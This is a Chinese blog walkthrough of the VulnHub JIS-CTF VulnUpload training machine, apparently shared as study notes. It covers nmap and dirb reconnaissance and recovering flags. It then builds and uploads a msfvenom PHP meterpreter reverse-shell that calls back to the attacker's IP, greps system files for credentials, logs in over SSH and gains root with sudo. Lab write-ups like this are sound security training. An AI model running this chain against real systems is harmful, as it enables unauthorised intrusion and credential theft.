JIS-CTF:vnlnUpload实战靶机,反弹websehll上传记录

最近看到了vnlnUpload上去浅浅打了一把,大家可以也去试一下对自己kali的基础运用巩固一下,这个靶场还是不错的涵盖了信息收集,robots,文件上传和ssh上线,我只是将自己的思路和攻击流程记录了一下。

我的截图可能有点乱因为这个靶场我打了两边第二遍才补充了细节部分

该靶机下载地址:https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/

  1. 主机发现

第一步将kali的权限提高 sudo su

密码为开始登录kali的密码

Namp -sn 192.168.38.0/24   

vm8网卡所使用的网段ip,扫描192.168.38.0下的所有开机了的ip

  1. 端口扫描

Namp -Pn 192.168.38.0/24

扫描192.168.38.0所有开机的主机并把端口给显示出来

因为网站所需要用到http服务所以网站主机需要打开80端口,唯一打开的80端口的主机是192.168.38.129.

目录爆破

得知了网站ip开始对网站下的目录进行扫描

Dirb http://192.168.38.129

把他扫出来的目录依次查看发现

192.168.38.129/flag

192.168.38.129/admin_area/

192.168.38.129/index

是有用的

4、从网站目录爆破到的页面中,耐心查找有用信息flag1、flag2

大家也可以进robots.txt查看一下他记录的路径

flag1:8734509128730458630012095

直接进flag目录就可以看见flag

flag2:7412574125871236547895214

第二个flag 需要你右击查看他的源码才能找到,在他的源码中还发现了账号和密码猜测是登录网站的账号和密码

5、第4步中,可以找到用户名和密码,用此登录网站成功,看到一个文件上传页面,用 msfvenom 制作php木马,然后上传木马。

我们在目录扫描中发现index.php是他的网站主页,并通过第四步发现的账号和密码发现上面有上传功能所以我们做个木马文件

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.38.128 ip lport=4444 -f raw >shell.php

(攻击者是kali机的ip 端口填千位数以上的 千位数以下的容易重复 3306 8080 不能用 例如4444 6666 2222都是可以用的)

msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机ip lport=攻击机端口 -f raw >shell.php

打完后桌面上会有一个shell.php在浏览器提交这个文件

6、调用exploit/multi/handler的后门模块,并渗透成功

使用命令msfconsole进入msf use exploit/multi/handler(use进入模块)

Show options(查看模块配置)

Lhost填IP地址

Lport填端口

设置攻击文件

set lhost 192.168.38.128(自己的ip)

set lport 4444

set payload php/meterpreter/reverse_tcp

run 运行

会发现跑不动因为他是反弹shell

你需要进入 192.168.38.128/uploaded_files/shell.php

启动这个shell文件

7、通过meterpreter进入系统shell界面,查看当前用户信息

Getuid    可以看见你现在的用户id

我们输入shell

8、浏览最近几个目录中的文件,有没有线索文件?找到flag3。(8分)

ls(查看现在路径下的文件)未发现什么有用的文件

现在下面没有我们就cd .. 退到上一级目录直到看见hint这个词语是提示的意思那我们试着查看一下

然后我们cat hint.txt 得到了Flag3:7645110034526579012345670

9、根据flag3的提示,去找对应用户(假设为“xxx”)的密码。

刚刚那个文件我们除了flag还得到了一串英文

try to find user technawi password to read the flag.txt file, you can find it in a hidden file

看不懂就翻译

(试着找到用户technawi的密码来读取flag.txt文件,你可以在一个隐藏的文件中找到它)

他要我们去找technawi的密码来读取文件flag.txt

  1. 找到包含用户名“xxx”文本的文件,并查看该文件,找到flag4

我们用grep -ri "technawi" /etc/*命令来查找 /etc/目录下所有带technawi字的文件

不要急一步一步查看到有关键字 用户名username和technawi

我们cat /etc/mysql/conf.d/credentials.txt这个为文本文件

拿到flag和一个账号密码

Flag4:

7845658974123568974185412

11、利用上一步找到的用户账号信息,进行ssh登陆,并查找flag5

在上面这题这段英文提示中我们还没有看到flag.txt文件

try to find user technawi password to read the flag.txt file, you can find it in a hidden file

(试着找到用户technawi的密码来读取flag.txt文件,你可以在一个隐藏的文件中找到它)

我们用ssh登录来看这个文件

为了方便我们另外开个终端

ssh -p22  technawi@192.168.38.129

(ssh -p22 用户名@IP地址)

username : technawi

password : 3vilH@ksor

刚刚flag.txt在/var/www/html 路径下

cd /var/www/html/

ls

cat flag.txt

Flag5:5473215946785213456975249

  1. 用户“xxx”可以直接切换到root权限吗?

我们提权sudo -i

输入technawi密码即可拿到root权限

以后会经常更各种靶场教程,学习笔记和edusrc一些挖掘流程  本人学生也是低危时长两年半的渗透实习生。无法做到天天更新sorry。希望和大家一起进步

希望大家可以关注下我的公众号:安全的比奇堡

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值